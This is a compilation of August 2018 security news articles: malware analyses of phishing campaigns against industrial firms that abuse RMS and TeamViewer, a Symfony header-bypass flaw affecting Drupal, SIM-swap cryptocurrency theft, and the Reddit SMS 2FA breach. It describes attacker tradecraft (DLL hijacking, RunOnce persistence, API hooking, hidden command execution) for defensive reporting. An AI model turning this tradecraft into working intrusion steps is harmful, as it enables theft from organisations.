As usual, such alerts don’t necessarily imply that the account has been compromised or that the organization has been hit with a larger attack.

The new feature is turned off by default, but admins can easily enable or disable it in Admin Console > Reports > Manage Alerts > Government backed attack.

The feature also allows admins to set who is being notified when such attacks are detected (by default, super admins receive the notification via email).

Once an attack has been detected, admins can choose to secure the account suspected to have been targeted, and can also opt to alert the user on both the attack and the security measures taken.

The feature is set to gradually roll out to all G Suite editions and should be available for all admins within the next 15 days, Google said.

Companies such as Microsoft, Facebook, and Twitter are also warning users when detecting attacks believed to have been performed by a government-backed actor.

Industrial Sector targeted in surgical spear-phishing attacks
3.8.2018 securityaffairs 

Industrial sector hit by a surgical spear-phishing campaign aimed at installing legitimate remote administration software on victims’ machines.
Attackers carried out a spear-phishing campaign against entities in the industrial sector, the messages disguised as commercial offers where used by attackers to deliver a legitimate remote administration software on victims’ systems (TeamViewer or Remote Manipulator System/Remote Utilities (RMS)).

Attackers personalized the content of each phishing email reflecting the activity of the target organization and the type of work performed by the employee to whom the email is sent.

The campaign was discovered by experts from Kaspersky Lab who speculate the attackers are financially motivated.

“Kaspersky Lab ICS CERT has identified a new wave of phishing emails with malicious attachments targeting primarily companies and organizations that are, in one way or another, associated with industrial production.” reads the blog post published by Kaspersky.

“According to the data available, the attackers’ main goal is to steal money from victim organizations’ accounts,”

Once the attackers have gained access to the victim’s system they will search for any purchase documents, as well as the financial and accounting software. Then the crooks look for various ways in which they can monetize their effort, for example, by spoofing the bank details used to make payments.

According to Kaspersky, there was a spike in the number of spear phishing messages in November 2017 that targeted up to 400 industrial companies located in Russia.

industrial sector spear-phishing

The spear-phishing campaign is still ongoing, the messages purported to be invitations to tender from large industrial companies.

The quality of the phishing messages suggests the attackers have spent a significant effort in the reconnaissance phase.

“It is worth noting that the attackers addressed an employee of the company under attack by his or her full name,” state the researchers. “This indicates that the attack was carefully prepared and an individual email that included details relevant to the specific organization was created for each victim.”

The attackers used both malicious attachments and links to external resources that are used to download the malicious code.

“Malicious files can be run either by an executable file attached to an email or by a specially crafted script for the Windows command interpreter.” states the researchers.

“For example, the archive mentioned above contains an executable file, which has the same name and is a password-protected self-extracting archive. The archive extracts the files and runs a script that installs and launches the actual malware in the system.”

Regarding the legitimate software used by the attackers, TeamViewer or Remote Manipulator System/Remote Utilities (RMS), for both, the attackers performed a DLL injection attack by injecting the malicious code directly into the process by substituting a malicious library for system DLL.

The malicious library includes the system file winspool.drv that is located in the system folder and is used to send documents to the printer.

The winspool.drv decrypts the attackers’ configuration files, including software settings and the password for remotely controlling the target machine.

In the case of RMS, one of the configuration files includes the email address used by the attacker to receive the information (i.e. computer name, username and the RMS machine’s internet ID) about the infected system.

When the attackers use TeamViewer software to exfiltrate system information, a file in a malicious library contains various parameters, including the password used for remotely controlling the system and a URL of the attackers’ command-and-control server.

Unlike RMS, Team Viewer also uses a built-in VPN to remotely control a computer located behind NAT.

“After launching, the malicious library checks whether an internet connection is available by executing the command “ping” and then decrypts the malicious program’s configuration file tvr.cfg. The file contains various parameters, such as the password used for remotely controlling the system, URL of the attackers’ command-and-control server, parameters of the service under whose name TeamViewer will be installed, the User-Agent field of the HTTP header used in requests sent to the command-and-control server, VPN parameters for TeamViewer, etc.” continues the analysis.

“Unlike RMS, Team Viewer uses a built-in VPN to remotely control a computer located behind NAT.”

Kaspersky highlighted that the industrial sector is becoming a privileged target for crooks, they are able to make profits even using simple techniques and known malware.

The use of legitimate Remote administration software allows crooks to gain full control of compromised systems avoiding detection.

“This choice on the part of the cybercriminals could be explained by the fact that the threat-awareness and cybersecurity culture in industrial companies is inferior to that in companies from other sectors of the economy (such as banks or IT companies),” Kaspersky concludes.

CVE-2018-14773 Symfony Flaw expose Drupal websites to hack
3.8.2018 securityaffairs 

A vulnerability in the Symfony HttpFoundation component tracked as CVE-2018-14773, could be exploited by attackers to take full control of the affected Drupal websites.
Maintainers at Drupal addressed the security bypass vulnerability by releasing a new version of the popular content management system, the version 8.5.6.

“The Drupal project uses the Symfony library. The Symfony library has released a security update that impacts Drupal. Refer to the Symfony security advisory for the issue. The same vulnerability also exists in the Zend Feed and Diactoros libraries included in Drupal core; however, Drupal core does not use the vulnerable functionality.” reads the advisory published by Drupal.

“If your site or module uses Zend Feed or Diactoros directly, read the Zend Framework security advisory and update or patch as needed.”

Symfony HttpFoundation component is a third-party library used in the Drupal Core, the flaw affects Drupal 8.x versions before 8.5.6.

Symfony is web application framework that is being used by a lot of projects, this means that the CVE-2018-14773 vulnerability could potentially affect a large number of web applications.

The flaw is due to the Symfony’s support for legacy and risky HTTP headers.

“Support for a (legacy) IIS header that lets users override the path in the request URL via the X-Original-URL or X-Rewrite-URL HTTP request header allows a user to access one URL but have Symfony return a different one which can bypass restrictions on higher level caches and web servers.” reads the security advisory published by Symfony.

“The fix drops support for these two obsolete IIS headers: X-Original-URL and X_REWRITE_URL.” reads the security advisory published Symfony.

A remote attack can trigger the flaw by using specially crafted ‘X-Original-URL’ or ‘X-Rewrite-URL’ HTTP header value.

According to the security advisory published by Symfony, the version 2.7.49, 2.8.44, 3.3.18, 3.4.14, 4.0.14, and 4.1.3 addressed the flaw.


The Drupal maintainers also found a similar issue affecting the Zend Feed and Diactoros libraries used in the Drupal Core. The libraries are affected by an ‘URL Rewrite vulnerability,’ anyway the Drupal team confirmed that the Drupal Core does not use the vulnerable functionality.

Administrators of websites that use Zend Feed or Diactoros directly need to patch them as soon as possible.

Drupal administrators need to patch their installs urgently before hackers will start exploiting the CVE-2018-14773 flaw.

Google introduced G Suite alerts for state-sponsored attacks
3.8.2018 securityaffairs  Attack

Google announced that has implemented an alerting system for G Suite admins when users have been targeted by state-sponsored attacks.
Google announced it will alert G Suite admins when state-sponsored hackers will target their users.

The new feature will be available in the G Suite Admin console very soon, it confirms the effort spent by the tech giant of protecting its users.

“We’re adding a feature in the Admin console that can alert admins if we believe a user’s account has been targeted by a government-backed attack. If an admin chooses to turn the feature on, an email alert (to admins) is triggered when we believe a government-backed attacker has likely attempted to access a user’s account or computer through phishing, malware, or another method.” reads the security advisory published by Google.

“It does not necessarily mean that the account has been compromised or that there was a widespread attack on an organization.”

In June 2012, for the first time, the company announced it was going to offer a specific protection service for a restrict number of users that could be the target of state-sponsored attacks.

Google is now implementing the new protection feature within the G Suite Admin console, admins will have the opportunity to receive alerts whenever attacks could be attributed to a nation-state actor.

Every time an attack will be detected, admins can choose to secure the account hit by the hackers and can also opt to alert the victim.

The alerts don’t necessarily imply that the account has been hacked or that the organization has been compromised in a massive attack.

G Suite state sponsored attacks

Google pointed out the alerts will be turned off by default, admins can choose to turn them on in the Admin Console > Reports > Manage Alerts > Government backed attack.

According to Google, the new feature is set to gradually roll out to all G Suite editions, the tech giant plans to make it available for all admins within the next 15 days.

Attacks on industrial enterprises using RMS and TeamViewer
3.8.2018 Kaspersky Attack

Main facts
Kaspersky Lab ICS CERT has identified a new wave of phishing emails with malicious attachments targeting primarily companies and organizations that are, in one way or another, associated with industrial production.

The phishing emails are disguised as legitimate commercial offers and are sent mainly to industrial companies located in Russia. The content of each email reflects the activity of the organization under attack and the type of work performed by the employee to whom the email is sent.

According to the data that we have collected, this series of attacks started in November 2017 and is currently in progress. Notably, the first similar attacks were recorded as far back as 2015.

The malware used in these attacks installs legitimate remote administration software – TeamViewer or Remote Manipulator System/Remote Utilities (RMS). This enables the attackers to gain remote control of infected systems. The threat actor uses various techniques to mask the infection and the activity of malware installed in the system.

According to the data available, the attackers’ main goal is to steal money from victim organizations’ accounts. When attackers connect to a victim’s computer, they search for and analyze purchase documents, as well as the financial and accounting software used. After that, the attackers look for various ways in which they can commit financial fraud, such as spoofing the bank details used to make payments.

In cases where the cybercriminals need additional data or capabilities after infecting a system, such as privilege escalation and obtaining local administrator privileges, the theft of user authentication data for financial software and services, or Windows accounts for lateral movement, the attackers download an additional pack of malware to the system, which is specifically tailored to the attack on each individual victim. The malware pack can include spyware, additional remote administration utilities that extend the attackers’ control on infected systems, malware for exploiting operating system and application software vulnerabilities, as well as the Mimikatz utility, which provides the attackers with Windows account data.

Apparently, among other methods, the attackers obtain the information they need to perpetrate their criminal activity by analyzing the correspondence of employees at the enterprises attacked. They may also use the information found in these emails to prepare new attacks – against companies that partner with the current victim.

Clearly, on top of the financial losses, these attacks result in leaks of the victim organizations’ sensitive data.

Phishing emails
In most cases, the phishing emails have finance-related content; the names of attachments also point to their connection with finance. Specifically, some of the emails purport to be invitations to tender from large industrial companies (see below).

Malicious attachments may be packed into archives. Some of the emails have no attachments – in these cases, message text is designed to lure users into following links leading to external resources and downloading malicious objects from those resources.

Below is a sample phishing email used in attacks on some organizations:

Screenshot of a phishing email

The above email was sent on behalf of a well-known industrial organization. The domain name of the server from which the message was sent was similar to the domain name of that organization’s official website. The email had an archive attached to it. The archive was protected with a password that could be found in the message body.

It is worth noting that the attackers addressed an employee of the company under attack by his or her full name (this part of the email was masked in the screenshot above for confidentiality reasons). This indicates that the attack was carefully prepared and an individual email that included details relevant to the specific organization was created for each victim.

As part of the attacks, the threat actor uses various techniques to mask the infection. In this case, Seldon 1.7 – legitimate software designed to search for tenders – is installed in infected systems in addition to malware components and a remote administration application.

To keep users from wondering why they didn’t get information on the procurement tender referred to in the phishing email, the malicious program distributes a damaged copy of Seldon 1.7 software.

Window of legitimate software Seldon 1.7

In other cases, the user is shown a partially damaged image.

Image opened by malware

There is also a known case of malware being masked as a PDF document containing a bank transfer receipt. Curiously, the receipt contains valid data. Specifically, it mentions existing companies and their valid financial details; even a car’s VIN matches its model.

Screenshot of a bank transfer receipt displayed by malware

The malware used in these attacks installs legitimate remote administration software – TeamViewer or Remote Manipulator System/Remote Utilities (RMS).

Attacks using RMS
There are several known ways in which the malware can be installed in a system. Malicious files can be run either by an executable file attached to an email or by a specially crafted script for the Windows command interpreter.

For example, the archive mentioned above contains an executable file, which has the same name and is a password-protected self-extracting archive. The archive extracts the files and runs a script that installs and launches the actual malware in the system.

Contents of the malware installation file

It can be seen from the commands in the screenshot above that after copying the files the script deletes its own file and launches legitimate software in the system – Seldon v.1.7 and RMS, – enabling the attackers to control the infected system without the user’s knowledge.

Depending on the malware version, files are installed in %AppData%\LocalDataNT folder %AppData%\NTLocalData folder or in %AppData%\NTLocalAppData folder.

When it launches, legitimate RMS software loads dynamic libraries (DLL) required for the program’s operation, including the system file winspool.drv, which is located in the system folder and is used to send documents to the printer. RMS loads the library insecurely, using its relative path (the vendor has been notified of this vulnerability). This enables the attackers to conduct a DLL hijacking attack: they place a malicious library in the same directory with the RMS executable file, as a result of which a malware component loads and gains control instead of the corresponding system library.

The malicious library completes malware installation. Specifically, it creates a registry value responsible for automatically running RMS at system startup. Notably, in most cases of this campaign the registry value is placed in the RunOnce key, instead of the Run key, enabling the malware to run automatically only the next time the system starts up. After that, the malware needs to create the registry value again.

It is most likely that the attackers chose this approach to mask the presence of malware in the system as well as possible. The malicious library also implements techniques for resisting analysis and detection. One such technique involves dynamically importing Windows API functions using their hashes. This way, the attackers do not have to store the names of these functions in the malicious library’s body, which helps them to conceal the program’s real functionality from most analysis tools.

Part of a malicious code fragment implementing the dynamic import of functions

The malicious dynamic library, winspool.drv, decrypts configuration files prepared by the attackers, which contain RMS software settings, the password for remotely controlling the machine and the settings needed to notify the attackers that the system has been successfully infected.

One of the configuration files contains an email address to which information about the infected system is sent, including computer name, user name, the RMS machine’s Internet ID, etc. The Internet ID sent as part of this information is generated on a legitimate server of the RMS vendor after the computer connects to it. The identifier is subsequently used to connect to the remotely controlled system located behind NAT (a similar mechanism is also used in popular instant messaging solutions).

A list of email addresses found in the configuration files discovered is provided in the indicators of compromise section.

A modified version of RC4 is used to encrypt configuration files. Configuration files from the archive mentioned above are shown below.

Decrypted contents of InternetId.rcfg file

Decrypted contents of notification.rcfg file

Decrypted contents of Options.rcfg file

Decrypted contents of Password.rcfg file

After this, the attackers can use the system’s Internet ID and password to control it without the user’s knowledge via a legitimate RMS server, using the standard RMS client.

Attacks using TeamViewer
Attacks using legitimate TeamViewer software are very similar to those using RMS software, which are described above. A distinguishing feature is that information from infected systems is sent to malware command-and-control servers, rather than the attackers’ email address.

As in the case of RMS, malicious code is injected into the TeamViewer process by substituting a malicious library for system DLL. In the case of TeamViewer, msimg32.dll is used.

This is not a unique tactic. Legitimate TeamViewer software has been used in APT and cybercriminal attacks before. The best-known group to have used this toolset is TeamSpy Crew. We believe that the attacks described in this document are not associated with TeamSpy and are the result of known malware being re-used by another cybercriminal group. Curiously, the algorithm used to encrypt the configuration file and the password for decrypting it, which were identified in the process of analyzing these attacks, are the same as those published last April in a description of similar attacks.

It is common knowledge that legitimate TeamViewer software does not hide its startup or operation from the user and, specifically, notifies the user of incoming connections. At the same time, the attackers need to gain remote control of the infected system without the user’s knowledge. To achieve this, they hook several Windows API functions.

The functions are hooked using a well-known method called splicing. As a result, when legitimate software calls one of the Windows API functions, control is passed to the malicious DLL and the legitimate software gets a spoofed response instead of one from the operating system.

Windows API function hooked by the malware

Hooking Windows API functions enables attackers to hide TeamViewer windows, protect malware files from being detected, and control TeamViewer startup parameters.

After launching, the malicious library checks whether an internet connection is available by executing the command “ping” and then decrypts the malicious program’s configuration file tvr.cfg. The file contains various parameters, such as the password used for remotely controlling the system, URL of the attackers’ command-and-control server, parameters of the service under whose name TeamViewer will be installed, the User-Agent field of the HTTP header used in requests sent to the command-and-control server, VPN parameters for TeamViewer, etc.

Screenshot of decrypted contents of the malware configuration file

Unlike RMS, Team Viewer uses a built-in VPN to remotely control a computer located behind NAT.

As in the case of RMS, the relevant value is added to the RunOnce registry key to ensure that the malware runs automatically at system startup.

The malware collects data on the infected machine and sends it to the command-and-control server along with the system’s identifier needed for remote administration. The data sent includes:

Operating system version
User name
Computer name
Information on the privilege level of the user on whose behalf the malware is running
Whether or not a microphone and a webcam are present in the system
Whether or not antivirus software or other security solutions are installed, as well as the UAC level
Information about security software installed in the system is obtained using the following WQL query:

root\SecurityCenter:SELECT * FROM AntiVirusProduct

The information collected is sent to the attackers’ server using the following POST request:

POST request used to send encrypted data to the command-and-control server

Another distinguishing feature of attacks that involve the TeamViewer is the ability to send commands to an infected system and have them executed by the malware. Commands are sent from the command-and-control server using the chat built into the TeamViewer application. The chat window is also hidden by the malicious library and the log files are deleted.

A command sent to an infected system is executed in the Windows command interpreter using the following instruction:

cmd.exe /c start /b

The parameter “/b” indicates that the command sent by the attackers for execution will be run without creating a new window.

The malware also has a mechanism for self-destructing if the appropriate command is received from the attackers’ server.

The use of additional malware
In cases where attackers need additional data (authorization data, etс.), they download spyware to victim computers in order to collect logins and passwords for mailboxes, websites, SSH/FTP/Telnet clients, as well as logging keystrokes and making screenshots.

Additional software hosted on the attackers’ servers and downloaded to victims’ computers was found to include malware from the following families:

Babylon RAT
AZORult stealer
Hallaj PRO Rat
In all probability, these Trojans were downloaded to compromised systems and used to collect information and steal data. In addition to remote administration, the capabilities of malware from these families include:

Logging keystrokes
Making screenshots
Collecting system information and information on installed programs and running processes
Downloading additional malicious files
Using the computer as a proxy server
Stealing passwords from popular programs and browsers
Stealing cryptocurrency wallets
Stealing Skype correspondence
Conducting DDoS attacks
Intercepting and spoofing user traffic
Sending any user files to the command-and-control server
In other cases observed, after an initial analysis of an infected system, the attackers downloaded an additional malware module to the victim’s computer – a self-extracting archive containing various malicious and legitimate programs, which were apparently individually selected for each specific system.

For example, if the malware had previously been executed on behalf of a user who did not have local administrator privileges, to evade the Windows User Account Control (UAC), the attackers used the DLL hijacking technique mentioned above, but this time on a Windows system file, %systemdir%\migwiz\migwiz.exe, and a library, cryptbase.dll.

Additionally, another remote administration utility, RemoteUtilities, which provides a more extensive feature set for controlling an infected machine than RMS or TeamViewer, has been installed in some systems. Its capabilities include:

Remotely controlling the system (RDP)
Transferring files to and from the infected system
Controlling power on the infected system
Remotely managing the processes of running application
Remote shell (command line)
Managing hardware
Capturing screenshots and screen videos
Recording sound and video from recording devices connected to the infected system
Remote management of the system registry
The attackers use a modified build of RemoteUtilities, which enables them to perform the above operations without the user’s knowledge.

In some cases, the Mimikatz utility was installed in addition to cryptbase.dll and RemoteUtilities. We believe that the attackers use Mimikatz in cases when the first system infected is not one that has software for working with financial data installed on it. In these cases, the Mimikatz utility is used to steal authentication data from the organization’s employees and gain remote access to other machines on the enterprise’s network. The use of this technique by the attackers poses a serious danger: if they succeed in obtaining the account credentials for the domain administrator’s account, this will give them control of all systems on the enterprise’s network.

Attack targets
According to KSN data, from October 2017 to June 2018, about 800 computers of employees working at industrial companies were attacked using the malware described in this paper.

Number of computers attacked by month. October 2017 – June 2018

According to our estimate, at least 400 industrial companies in Russia have been targeted by this attack, including companies in the following industries:

Oil and gas
Based on this, it can be concluded that the attackers do not concentrate on companies in any specific industry or sector. At the same time, their activity clearly demonstrates their determination to compromise specifically systems belonging to industrial companies. This choice on the part of the cybercriminals could be explained by the fact that the threat awareness and cybersecurity culture in industrial companies is inferior to that in companies from other sectors of the economy (such as banks or IT companies). At the same time, as we have noted before, it is more common for industrial companies than for companies in other sectors to conduct operations involving large amounts of money on their accounts. This makes them an even more attractive target for cybercriminals.

This research demonstrates once again that even when they use simple techniques and known malware, threat actors can successfully attack many industrial companies by expertly using social engineering and masking malicious code in target systems. Criminals actively use social engineering to keep users from suspecting that their computers are infected. They also use legitimate remote administration software to evade detection by antivirus solutions.

This series of attacks targets primarily Russian organizations, but the same tactics and tools can be used in attacks against industrial companies in any country of the world.

We believe that the threat actor behind this attack is highly likely to be a criminal group whose members have a good command of Russian. This is indicated by the high level at which texts in Russian are prepared for phishing emails used in the attack, as well as the attackers’ ability to make changes to organizations’ financial data in Russian. More data about the research on the infrastructure and language used by the attackers is available in the private version of the report on the Treat Intelligence portal.

Remote administration capabilities give criminals full control of compromised systems, so possible attack scenarios are not limited to the theft of money. In the process of attacking their targets, the attackers steal sensitive data belonging to target organizations, their partners and customers, carry out surreptitious video surveillance of the victim companies’ employees, and record audio and video using devices connected to infected machines.

The various malware components used in this attack are detected by Kaspersky Lab products with the following verdicts:


Student Charged in Elaborate Digital Money Theft Scheme

3.8.2018 securityweek Hacking

LOS ANGELES (AP) — A Massachusetts college student who was named his high school's valedictorian for his savvy tech skills hacked into unsuspecting investors' personal cellphones, email and social media accounts to steal at least $2 million in digital currency like Bitcoin, according to documents provided by California prosecutors Wednesday.

Joel Ortiz was taken into custody July 12 at Los Angeles International Airport ahead of a flight to Boston, according to prosecutors. The 20-year-old faces more than two dozen charges including grand theft, identity theft and computer hacking, court documents show. He's held on $1 million bail.

The Santa Clara County, California, public defender's office, which is representing Ortiz, declined comment. A number listed for his home in Boston was disconnected.

The elaborate scheme involved taking over victims' phones, allowing him to reset passwords and access online accounts containing electronic assets in the form of Bitcoin, Coinbase, Bittrex and Binance, the criminal complaint said.

In one case Ortiz allegedly walked into an AT&T store and impersonated a victim in order to get a new SIM card, which gave him control of the victim's phone. He obtained access to the victim's "financial and personal identifying information, tax returns, private passwords" and siphoned $10,000 from a cryptocurrency account, according to police report.

In several instances Ortiz allegedly impersonated victims over text messages and convinced friends and family members to "loan" him digital funds, court documents said.

At one point Ortiz allegedly stole $10,000 from a California resident, and then tried to get more, calling the victim's wife and sending a text to the victim's daughter that said "TELL YOUR DAD TO GIVE US BITCOIN," the documents said.

Court documents identify more than 20 victims who live in California, and prosecutors say they know of additional victims outside of the state.

Ortiz enrolled at the University of Massachusetts Boston and studies information technology, said school spokesman DeWayne Lehman.

Ortiz was the 2016 valedictorian of Another Course to College, a small public college preparatory school in Boston, and was honored alongside other top students across the city at a luncheon that year with Democratic Mayor Marty Walsh and other officials at a downtown hotel.

At his school, Ortiz was the lead robot software programmer on its robotics team, taught other students the basics of software coding and "led efforts to teach computer science," according to a Boston Public Schools' press release touting the students' accomplishments.

The school system said Ortiz "loves science and technology," is fluent in Spanish and speaks conversational Chinese.

Boston Public Schools spokesman Daniel O'Brien declined to comment.

Cisco to Acquire Duo Security for $2.35 Billion in Cash

3.8.2018 securityweek IT

Cisco announced on Thursday that it will pay $2.35 billion in cash to acquire cloud-based identity and access management solutions provider Duo Security.

Ann Arbor, Michigan-based Duo raised $70 million in Series D funding in October 2017, which valued the company at $1.17 billion at the time.

Through its flagship two-factor authentication (2FA) app, Duo's "Trusted Access" product suite helps verify the identity of users, and the health of their devices, before granting them access to applications. The platform supports Macs, PCs and mobile devices, and gives administrators visibility into end user devices accessing the corporate network.

Duo Security Logo“Integration of Cisco's network, device and cloud security platforms with Duo Security's zero-trust authentication and access products will enable Cisco customers to easily and securely connect users to any application on any networked device,” Cisco said.

Overall, Cisco says that by getting its hands on Duo’s technology, it will be able to extend intent-based networking into multi-cloud environments, simplify policy for cloud security, and expand endpoint visibility coverage.

The acquisition is expected to close during the first quarter of Cisco's fiscal year 2019, subject to customary closing conditions and required regulatory approvals.

Duo said previously that it has doubled its annual recurring revenue for the past four years, and currently has more than 500 employees globally, after doubling its headcount in 2016.

Duo serves more than 10,000 paying customers and said protects more than 300 million logins worldwide every month. Customers include Facebook, Etsy, Facebook, K-Swiss, Paramount Pictures, Toyota, Random House, Yelp, Zillow and more.

In addition to its Ann Arbor, Michigan headquarters, Duo currently maintains offices in Austin, Texas; San Mateo, California; and London, England.

Duo Security, which will continue to be led by Dug Song, Duo Security's co-founder and chief executive officer, will join Cisco's Networking and Security business led by EVP and GM David Goeckeler.

Cisco has acquired several emering security companies over the years. In June 2015, it announced its acquisition of OpenDNS for $635 Million. The move followed other acquisitions by Cisco in the security sector, including its acquisition of Porcullis, ThreatGRID, Neohapsis, Virtuata, and its $2.7 billion acquistionof Sourcefire in 2013. In June 2016, it agreed to pay $293 million to acquire cloud access security broker (CASB) CloudLock.

Attackers Circumvent Two Factor Authentication Protections to Hack Reddit

3.8.2018 securityweek Crypto

Popular Community Site Reddit Breached Through Continued Use of NIST-Deprecated SMS Two Factor Authentication (2FA)

Online community site Reddit announced Wednesday that it was breached in June 2018. In a refreshingly candid advisory, it provides a basic explanation of how the incident occurred, details on the extent of the breach, details on its own response, and advice to potential victims.

The extent of the breach was limited. It was discovered on June 19, and occurred between June 14 and June 18, this year. "A hacker broke into a few of Reddit's systems and managed to access some user data, including some current email addresses and a 2007 database backup containing old salted and hashed passwords," announced Chris Slowe, CTO and founding engineer at Reddit.

With more than 330 million active monthly users, Reddit is home to thousands of online communities where users can share stories and host public discussions.

Apart from the limited extent, it was also limited in scope. "The attacker did not gain write access to Reddit systems; they gained read-only access to some systems that contained backup data, source code and other logs." This comprises a complete copy of an old database backup including account credentials and email addresses (2005 to 2007); logs containing email digests sent between June 3 and June 17, 2018; and internal data such as source code, internal logs, configuration files and other employee workspace files.

"The disclosure of email addresses and their connected Reddit usernames," warns Jessica Ortega, a security researcher at SiteLock, "could potentially mean attackers can identify and dox users -- that is, release personally identifying information -- who rely on Reddit for discussing controversial topics or posting controversial images. It is recommended that all Reddit users update their passwords."

Reddit's response to the breach has been to report the incident to, and cooperate with, law enforcement; to contact users who may be impacted; and to strengthen its own privileged access controls with enhanced logging, more encryption and required token-based 2FA. It also advises all users to move to token-based 2FA.

This advice is because it believes the breach occurred through SMS intercept on one of its own employees. "We learned that SMS-based authentication is not nearly as secure as we would hope, and the main attack was via SMS intercept."

This last comment has raised eyebrows. As long ago as 2016, NIST denounced SMS 2FA. "Due to the risk that SMS messages may be intercepted or redirected, implementers of new systems SHOULD carefully consider alternative authenticators," it stated in the DRAFT NIST Special Publication 800-63B.

The most common attack against SMS 2FA, explains Joseph Kucic, CSO at Cavirin, is mobile device malware designed to capture/intercept SMS messages -- a major feature for use against mobile banking apps. But, he adds, "SMS messages have had other risks: SIM swap and unauthorized access from SS7 (core telco signaling environments) -- these issues have been known and discussed in the security circles for years."

While Reddit doesn't make it clear whether the 'intercept' was via malware on an employee's mobile device or via flaws in the SS7 telecommunications protocol, the latter seems the most likely. SS7 is a telephony signaling protocol initially developed in 1975, and it has become deeply embedded in mobile telephone routing. As such it is unlikely to be corrected or replaced in the immediate future -- but the effect is that almost any mobile telephone conversation anywhere in the world can be intercepted by an advanced adversary.

The fact that SS7 attacks are not run-of-the-mill events makes Tom Kellermann, CSO at Carbon Black, wonder who might be behind the attack. "The Reddit breach seems to be more tradecraft-oriented," he told SecurityWeek. "They were victimized, but by whom: more than likely a nation-state given their capacity to influence Americans. I hope that they were not used to island hop into other victims' systems via a watering hole." According to Carbon Black research, 36% of cyberattacks attempt to leapfrog through the victims' systems into their customers' systems.

He is not alone in wondering if there may be more to this breach. "I am concerned that Reddit seems to be playing down the data breach as it was only read access to sensitive data and not write. This is positive news; however, it does not reduce the severity of the data breach when it relates to sensitive data," comments Joseph Carson, chief security scientist at Thycotic.

Of course, the attack may not have been effected via the SS7 flaws. "In this type of attack, the phone number is the weakest link," warns Tyler Moffit, senior threat research analyst at Webroot. "Cybercriminals can steal a victim's phone number by transferring it to a different SIM card with relative ease, thereby getting access to text messages and SMS-based authentication. For example, a cybercriminal would simply need to give a wireless provider an address, last 4 digits of a social security number, and perhaps a credit card to transfer a phone number. This is exactly the type of data that is widely available on the dark web thanks to large database breaches like Equifax."

"When Reddit started using SMS for Two Factor Authentication in 2003 it was a best practice," Joseph Kucic, CSO at Cavirin told SecurityWeek; adding, "The one fact about any security technology is that its effectiveness decreases over time for various reasons -- and one needs to take inventory of the deployed security effectiveness at least annually." He believes that security technologies, just like applications, have a product lifecycle, "and there is a point when an end-of-life should be declared before unauthorized individuals -- hackers or nation/state actors -- do it for you."

Reddit has earned plaudits for its breach notification as well as criticism for its continued use of SMS 2FA. "The level of detail Reddit provides," said Chris Morales, head of security analytics at Vectra, "is more than many larger organizations have provided on much more significant breaches. These details are based on an investigation and explain what happened during the breach -- how the attackers infiltrated the network and what exactly they gained access to -- and most importantly disclosed Reddit's internal processes to address the breach, including the hiring of new and expanded security staff."

Ilia Kolochenko, CEO at High-Tech Bridge, makes the point that despite Reddit's apparent openness, we still don't know everything about the breach. "Often, large-scale attacks are conducted in parallel by several interconnected cybercrime groups aimed to distract, confuse and scare security teams," he comments. "While attack vectors of the first group are being mitigated, others are actively exploited, often not without success. Otherwise, the disclosure and its timeline are done quite well done by Reddit."

He also cautions against placing too much blame on Reddit's use of SMS 2FA. "I would refrain from blaming the 2FA SMS -- in many cases it's still better than nothing. Moreover, when most of business-critical applications have serious vulnerabilities varying from injections to RCE, 2FA hardening is definitely not the most important task to take care of."

Nevertheless, the consensus is that Reddit should be applauded for its disclosure, but censured for its use of SMS 2FA. "Reddit won't be the last organization to be breached via SMS authentication in the future," comments Sean Sullivan, security advisor at F-Secure. "At this point, the use of SMS-based MFA for administrators should be considered negligent."

Phishing Campaign Targets 400 Industrial Organizations

3.8.2018 securityweek Phishing

A new wave of spear-phishing emails masquerading as legitimate procurement and accounting letters have hit over 400 industrial organizations, according to Kaspersky Lab.

Data collected by Kaspersky showed that the malware associated with the campaign attacked nearly 800 company PCs across various industries. The attacks, which are ongoing, attempt to steal money and confidential data from the targeted organizations, which include oil and gas to metallurgy, energy, construction and logistics.

The spear-phishing emails, Kaspersky’s security researchers discovered, are tailored with “content that corresponded to the profile of the attacked organizations and took into account the identity of the employee – the recipient of the letter.”

“This suggests that the attacks were carefully prepared and that criminals took the time to develop an individual letter for each user,” the researchers say.

The emails either contain malicious attachments designed to silently install modified legitimate software onto the victim’s machine, such as TeamViewer or Remote Manipulator System/Remote Utilities (RMS), or try to trick victims into following external links and downloading malicious objects from there.

Analysis of the attacks has revealed the use of various techniques to mask the presence of malware on the system. Incidents involving RMS software relied on exfiltrating data over email, while those abusing legitimate TeamViewer software sent the data directly to a command and control (C&C) server.

The main goals of these attacks is to steal money from the victim organizations’ accounts. After gaining access to a victim’s system and gathering required information by accessing documents and financial and accounting software, the attackers would engage in various financial fraud operations, such as spoofing the bank details used to make payments.

When needed, the attackers would also upload additional malware onto the compromised machines, specifically crafted for each attack. They have been using spyware, remote administration tools to expand their control over the infected systems, Mimikatz, and malware to exploit different vulnerabilities in the operating system.

Some of the malicious programs found on compromised machines includes the Babylon RAT, Betabot/Neurevt, AZORult stealer, Hallaj PRO Rat families. These allowed attackers to log keystrokes, take screenshots, collect system information, download additional malware, steal passwords and crypto-currency wallets, intercept traffic, and conduct distributed denial of service (DDoS) attacks.

In some attacks, the remote administration tool called RemoteUtilities was used to remotely control the infected system, transfer files, manage running applications, manage hardware, remote shell, capture screenshots and screen videos, and record audio and video.

While the attacks did not appear to concentrate on companies in a specific industry or sector, the actors did focus on compromising systems belonging to industrial companies. Furthermore, most of the organizations that were hit are located in Russia, Kaspersky said.

“The attackers demonstrated a clear interest in targeting industrial companies in Russia. Based on our experiences, this is likely to be due to the fact that their level of cybersecurity awareness is not as high as it is in other markets, such as financial services. That makes industrial companies a lucrative target for cybercriminals – not only in Russia, but across the world,” Vyacheslav Kopeytsev, security expert, Kaspersky Lab, said.

Iran-Linked Actor Targets U.S. Electric Utility Firms
3.8.2018 securityweek CyberSpy

Likely operating out of Iran, the Leafminer cyber-espionage group has been targeting entities in the United States, Europe, Middle East, and East Asia, industrial cybersecurity firm Dragos warns.

The group was previously said to have been targeting government and other types of organizations in the Middle East since at least early 2017, but it appears that its target list is much broader.

Dragos, which calls the actor RASPITE, says the entity has been targeting industrial control systems in numerous countries, including access operations in the electric utility sector in the United States.

Initial access to target networks is obtained through strategic website compromise (also known as watering hole attacks), the security firm says. Similar to DYMALLOY and ALLANITE threat actors, the group embeds a link to a resource to prompt an SMB connection to harvests Windows credentials.

Next, the actor deploys scripts to install a malicious service that connect to the RASPITE-controlled infrastructure and provide remotely access the victim machine.

Although it did focus on ICS-operating entities, RASPITE has yet to demonstrated an ICS-specific capability. At the moment, there is no indication that the actor can launch destructive ICS attacks such as the widespread blackouts that hit Ukraine.

